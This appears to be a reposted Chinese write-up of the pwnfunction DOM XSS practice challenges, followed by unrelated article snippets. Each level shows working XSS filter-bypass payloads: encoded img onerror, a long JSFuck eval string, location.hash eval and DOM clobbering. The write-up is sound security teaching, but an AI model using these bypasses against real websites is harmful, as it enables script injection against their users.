xss.pwnfunction(DOM型XSS)靶场

环境进入该网站

Challenges (pwnfunction.com)

第一关:Ma Spaghet! 

源码:

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

要求:

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.

分析源码:

在script标签里边,使用get传参的方式给somebody传一个值,如果没有传值,默认传Somebody+Toucha Ma Spaghet!,然后赋值给spaghet,放在h2标签中

这里的spaghet后边加了一个innerHTMl的属性,官方解释

innerHTMLElement.innerHTML 属性设置或获取 HTML 语法表示的元素的后代。icon-default.png?t=N7T8https://developer.mozilla.org/zh-CN/docs/Web/API/Element/innerHTML

我们用script插入这里看似插进去了,但是不会执行。所以我们换一个

这样我们就成功绕过

官方给的答案,原理是一样的,只是标签不一样。

第二关:Jefff

源码:

<!-- Challenge -->
<h2 id="maname"></h2>
<script>let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")let ma = ""eval(`ma = "Ma name ${jeff}"`)setTimeout(_ => {maname.innerText = ma}, 1000)
</script>

要求:

  • Difficulty is Easy.
  • Pop an alert(1337) on sandbox.pwnfunction.com.
  • No user interaction.
  • Cannot use https://sandbox.pwnfunction.com/?html=&js=&css=.
  • Tested on Chrome.

分析源码:

这里首先使用get传参的方式,给jeff一个值,将值传给let jeff,变量ma然后执行Ma name +jeff传入的值,setTimeout是延时执行ma,这里的ma带了一个ineerText的属性

官方解释

他不会去渲染我们的css样式,意思就是我们在加什么标签之类的东西都不会起效果。所以我们这里只能换一种思路,他不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码

这很明显,我们成功绕过

第三关:Ugandan Knuckles

源码:

<!-- Challenge -->
<div id="uganda"></div>
<script>let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");wey = wey.replace(/[<>]/g, '')uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

要求还是和之前的一样

分析源码:

还是使用get方式传参;首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路;

这里使用onfocus 和autofucus 使用焦点的原理,可以使用onfocus获取焦点,再利用autofocus自动获取焦点,所以我们就触发执行代码

第四关:Ricardo Milos

源码:

<!-- Challenge -->
<form id="ricardo" method="GET"><input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')setTimeout(_ => {ricardo.submit()}, 2000)
</script>

分析源码:

使用get方式传参;传一个值给Ricardo,这里的submit是提交,意思是将我们传入的值过两秒传给Ricardo。action是他接受的一个伪协议,这里就使用一下JavaScript

第五关:Ah That's Hawt

源码:

<!-- Challenge -->
<h2 id="will"></h2>
<script>smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")smith = smith.replace(/[\(\`\)\\]/g, '')will.innerHTML = smith
</script>

源码分析:

这里主要是过滤,将()\ 和反引号过滤 ;会将这些符号转化为空

还有inner HTML,所以script也不能用了

不妨试一下用img的报错实现,因为我们的括号被过滤,那么我们可以试下使用实体编码进行绕过

?markassbrownlee=<img%20src=1%20οnerrοr=alert&#40;1337&#41;>

在h2这并没有找到我们插入的标签,这是为什么呢?明明也没有过滤我们的img标签啊

其实是因为url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码

?markassbrownlee=<img%20src=1%20onerror=alert%26%2340%3B1337%26%2341%3B>

第六关:Ligma

源码:

/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

这里我们有个技巧,当看到过滤了大小写和数字时,我们使用一个工具就可以直接进行

解决办法:
利用框架绕过:https://jsfuck.com/

他就会用一些符号来表示我们的字符和数字等

这里我们将上边转好的复制输入进去

因为+在url传参时,会解码为空格,所以我们要对这些符号再次编码

?balls=%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%28%5B%2B%5B%5D%5D%2B%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29

第七关:Mafia

源码:

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

分析源码:

这里还是get方式传参,但是限制我们传入的参数长度最大为50个字节,而且过滤了一大堆东西,最后执行mafia

很明显上一关的方法就不行了

代码漏洞,他过滤了符号和alert函数,但是没有过滤confirm 函数

?mafia=confirm(1)

但很明显,这一题的考察点不在这里

我看了官方给出的3个答案

首先第一个答案:

Function构造了一个ALERT(1337)函数,

source 然后调用函数的源码,就拿到了ALERT(1337),在调用js中的转成小写,最后在加上一个括号就表示执行函数。这样就绕过了上边的限制条件,并且成功执行

第二个:

eval(8680439..toString(30))(1337)

toString()是返回一个函数的字符串,内容是函数的源码

这里返回了一个alert,那我们大胆猜前边的8680439就是的,但是是咋来的呢?其实就是我们的alert使用parseint函数转换成了30进制的一个整数

这里的三十是代表三十进制,因为要想直接显示alert,16进制是从0-9,A-F,所以到T这里就是三十进制了。所以最后执行代码就成功了。

第三个:

eval(location.hash.slice(1))

我们可以看到,location.hash,取到的是url里#后的值,slice函数是分片,可以将#后面的提取到

那么#后面写上alert(1337),前面加上eval(location.hash.slice(1))就可以了

?mafia=eval(location.hash.slice(1))#alert(1337)

第八关:Ok, Boomer

源码:

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")setTimeout(ok, 2000)
</script>

分析:

这道题通过get参数将内容写入h2标签内,而且有过滤框架DOMPurify

DOMPurify防御用户输入框架,会把你的危险属性过滤完了

这个过滤框架由安全团队cure53开发,以我们的技术很难绕过

但是注意setTimeout函数内的ok参数

这里的JS代码是没有任何关于ok参数的定义的,所以我们可以使用DOM破坏

在这里右键--查看源代码会找到这个防御的框架

突破口

setTimeout(ok, 2000)

 这里使用一个dom clobbering称之为dom破坏技术

<a id=ok href=tel:alert(1337)>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/758416.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

YOLO_you only look once

前言 计算机图形学的课程即将结束&#xff0c;我需要提交一份关于YOLO模型的学习报告。在这段时间里&#xff0c;我对YOLO进行了深入的学习和研究&#xff0c;并记录下了我的学习过程和心得体会。本文将详细介绍YOLO模型的原理、优缺点以及应用领域&#xff0c;希望能够为后续…

css 如何获取分辨率(使用@media查询)

在CSS中&#xff0c;可以使用media查询来应对不同的屏幕分辨率。例如&#xff0c;您可以为不同的屏幕宽度设置不同的样式规则。 /* 针对屏幕宽度小于600px的样式 */ media screen and (max-width: 599px) {body {background-color: lightblue;} }/* 针对屏幕宽度大于或等于600…

spring整合Sentinel

安装sentinel&#xff1a; 执行命令; java -jar sentinel-dashboard-1.8.6.jar 注:sentinel的默认端口为8080&#xff0c;容易出现tomcat的冲突。 当端口冲突&#xff0c;可以使用该指令修改sentinel的端口 默认账号和密码都为sentinel Springcloud整合sentinel&#xff1a;…

首个业内DNA存储技术规范发布

在DNA数据存储的检索过程中&#xff0c;采用了三个输入对应一个输出逻辑实现的算法模式来生成数据表示的模式。这一算法模式的设计是为了有效编码和解码存储在DNA分子上的信息。 其中提到的“扰动比例”δ(n)是一个关键概念&#xff0c;它衡量的是在总的细胞数目&#xff08;此…

UE4_官方动画内容示例1.2_动画蓝图——使用蓝图告知Actor播放动画

展示了两个示例&#xff1a;在其中一个示例中&#xff0c;使用蓝图告知Actor播放动画&#xff0c;在另外一个示例中&#xff0c;展示了告知Actor播放动画的动画蓝图&#xff08;例如&#xff0c;此示例展示了如何将变量从蓝图传递给动画蓝图&#xff0c;并演示了如何将现有姿势…

【LabVIEW FPGA入门】插值、输出线性波形

概述 NI 的可重配置 I/O (RIO) 硬件使开发人员能够创建自定义硬件&#xff0c;以在坚固耐用、高性能和模块化架构中执行许多任务&#xff0c;而无需了解低级 EDA 工具或硬件设计。使用 RIO 硬件轻松实现的此类任务之一是模拟波形生成。本教程介绍了使用 CompactRIO 硬件和 LabV…

【Unity】Plastic云同步总是password error

【背景】 Plastic是Unity的项目版本控制功能&#xff0c;可以方便在多个地点同步项目进度。原本用得挺爽的&#xff0c;结果今天遇到糟心事&#xff0c;明明Hub也正常登着&#xff0c;可Plastic的一个update的dll就是不停反复运行并报Password invalid。 【问题分析】 听说I…

简易版 RPC 框架实现 2.0 -netty实现

这一篇理解如果有难度&#xff0c;可能对netty不是很理解&#xff0c; 可以关注我netty专栏&#xff0c;还有另外一篇&#xff1a; 用 Netty 自己实现简单的RPC&#xff0c; 这一篇是学习netty的时候写的&#xff0c;更倾向于分析netty相关的知识&#xff0c; 今天我是学习dubb…

【每日算法】理论:常见AIGC模型; 刷题:力扣单调栈

上期文章 【每日算法】理论&#xff1a;生成模型基础&#xff1b; 刷题&#xff1a;力扣单调栈 文章目录 上期文章一、上期问题二、理论问题1、stable diffusion模型的网络架构2、T5的网络架构&#xff08;Text-To-Text Transfer Transformer模型&#xff09;3、SDXL模型4、DA…

基于FPGA的光纤通信系统的实现的优化技巧与方法

逻辑电路基本框架回顾 跨时钟域同步技术 读写操作相互独立时钟域 A 和 B 不需要一致的相位由专门逻辑控制读写操作的切换 高速数据的乒乓缓存技术

代码随想录(day7)——哈希表

Leetcode.454 四数相加Ⅱ&#xff1a; 454. 四数相加 II - 力扣&#xff08;LeetCode&#xff09; 对于本题&#xff0c;虽然使用四层循环嵌套可以解决&#xff0c;但是效率过慢&#xff0c;为&#xff0c;因此&#xff0c;可以将给定的四个数组&#xff0c;分成两组&#xff…

在服务器上配置源和安装anaconda

在服务器上配置源和安装anaconda解决无法import torch的方法&#xff1a; 一、在 anaconda上创建环境 1、创建环境 conda create -n yourname pythonx.x 2、查看环境 conda info --envs 3、进入环境 source activate your_env_name 4、退出环境 conda deactivate 5、…

程序计数器

程序计数器 JVM中的程序计数器(Program Counter Register)并非是广义上所指的物理寄存器&#xff0c;是对物理PC寄存器的一种抽象模拟 PC寄存器(程序计数器) PC寄存器用来存储指向下一条指令的地址&#xff0c;也即将要执行的指令代码。由执行引擎读取下一条指令。 它是一块很…

Adams Car——Adams car与Simulink联合仿真

1.修改悬架阻尼、刚度 ①先找到车辆悬架阻尼和刚度文件,这里以阻尼显示为例 ②修改阻尼曲线 找到对应车的文件 ③修改完后进行替换,刚度修改同理 2.转动惯量与车的质量修改

【晶振选型】VCTCXO TCXO 布线 参考

一、供电旁路电容 二、使能信号 三、输出的交流耦合 四、输出波形转换 五、压控滤波电容 最后 CTS的是真不错&#xff0c;1K可是-140啊

Linux---基本操作命令之用户管理命令

1.1useradd 添加新用户 root用户&#xff1a;/root 普通用户&#xff1a;/home/ 创建的用户还是david&#xff0c;只是在dave文件夹下 1.2 passwd 设置密码 给用户tony设置密码: 123456 1.3 id 查看用户是否存在 查看有没有这个用户&#xff1a;id 名字 gid&#xff1a;用…

Spring MVC文件下载配置

版权声明 本文原创作者&#xff1a;谷哥的小弟作者博客地址&#xff1a;http://blog.csdn.net/lfdfhl 文件下载 在Spring MVC中通常利用commons-io实现文件下载&#xff0c;示例代码如下&#xff1a; Controller RequestMapping("......") public class DownloadC…

外卖项目:使用AOP切面编程实现增删改查的操作日志记录(debug断点调试)

文章目录 一、问题描述二、问题分析三、断掉调试四、代码展示 一、问题描述 需求&#xff1a;将项目中增、删、改相关接口的操作日志记录到数据库表中。 操作日志信息包含&#xff1a; 操作人、操作时间、执行方法的全类名、执行方法名、方法运行时参数、返回值、方法执行时…

MySQL数据库基本操作和管理

目录 一.MySQL数据库基本操作 1.SQL分类 &#xff08;1&#xff09;数据库&#xff1a;database &#xff08;2&#xff09;表&#xff1a;table&#xff0c;行&#xff1a;row 列&#xff1a;column &#xff08;3&#xff09;索引&#xff1a;index &#xff08;4&…

Linux网络编程: TCP协议首部与可选项简述

一、TCP/IP五层模型 物理层&#xff08;Physical Layer&#xff09;&#xff1a;物理层是最底层&#xff0c;负责传输比特流&#xff08;bitstream&#xff09;以及物理介质的传输方式。它定义了如何在物理媒介上传输原始的比特流&#xff0c;例如通过电缆、光纤或无线传输等。…